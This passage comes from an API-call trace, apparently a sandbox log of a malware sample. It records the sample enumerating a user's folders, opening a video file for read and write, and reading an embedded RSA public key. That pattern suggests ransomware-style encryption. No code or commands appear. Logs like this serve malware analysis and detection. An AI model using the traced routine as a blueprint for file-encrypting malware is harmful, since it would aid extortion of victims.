0x2d154b0 [0187.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.847] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\SendTo\\") returned="SendTo\\" [0187.847] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.847] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.848] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.848] PathFindFileNameW (pszPath="") returned="" [0187.848] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\SendTo\\*" (normalized: "c:\\users\\keecfmwgj\\sendto\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0187.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.849] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.849] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.849] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Start Menu\\") returned="Start Menu\\" [0187.849] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.849] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.849] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.849] PathFindFileNameW (pszPath="") returned="" [0187.849] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Start Menu\\*" (normalized: "c:\\users\\keecfmwgj\\start menu\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0187.849] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.849] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.849] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Templates\\") returned="Templates\\" [0187.850] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.850] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.850] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.850] PathFindFileNameW (pszPath="") returned="" [0187.850] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Templates\\*" (normalized: "c:\\users\\keecfmwgj\\templates\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0187.850] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.850] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.850] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0187.850] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.850] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.850] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.851] PathFindFileNameW (pszPath="") returned="" [0187.851] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x99001db0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x99001db0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0187.851] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x99001db0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x99001db0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.851] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9426b590, ftCreationTime.dwHighDateTime=0x1d89bcf, ftLastAccessTime.dwLowDateTime=0x2720a960, ftLastAccessTime.dwHighDateTime=0x1d8a43a, ftLastWriteTime.dwLowDateTime=0x2720a960, ftLastWriteTime.dwHighDateTime=0x1d8a43a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-DwrKzslsF2", cAlternateFileName="-DWRKZ~1")) returned 1 [0187.851] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935b90b0, ftCreationTime.dwHighDateTime=0x1d8a4bf, ftLastAccessTime.dwLowDateTime=0xfdb39df0, ftLastAccessTime.dwHighDateTime=0x1d8a4e6, ftLastWriteTime.dwLowDateTime=0xfdb39df0, ftLastWriteTime.dwHighDateTime=0x1d8a4e6, nFileSizeHigh=0x0, nFileSizeLow=0xf836, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7oqi8LaYkzM3PzQg.flv", cAlternateFileName="7OQI8L~1.FLV")) returned 1 [0187.851] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\7oqi8LaYkzM3PzQg.flv") returned=".flv" [0187.851] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\7oqi8LaYkzM3PzQg.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\7oqi8laykzm3pzqg.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.853] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=63542) returned 1 [0187.853] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.856] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf810, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.856] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.859] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.859] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xf836, lpOverlapped=0x0) returned 1 [0187.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.861] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.862] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.862] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.862] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.862] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.862] GetLastError () returned 0x0 [0187.862] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.862] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.863] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.863] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.863] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf840) returned 0x2d43778 [0187.863] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38dd8 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.864] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0187.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0187.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397d8 [0187.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d397c0 [0187.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0187.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0187.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.867] GetCurrentThreadId () returned 0x264 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37f48 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.868] GetCurrentThreadId () returned 0x264 [0187.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0187.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397d8 [0187.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.871] HeapFree 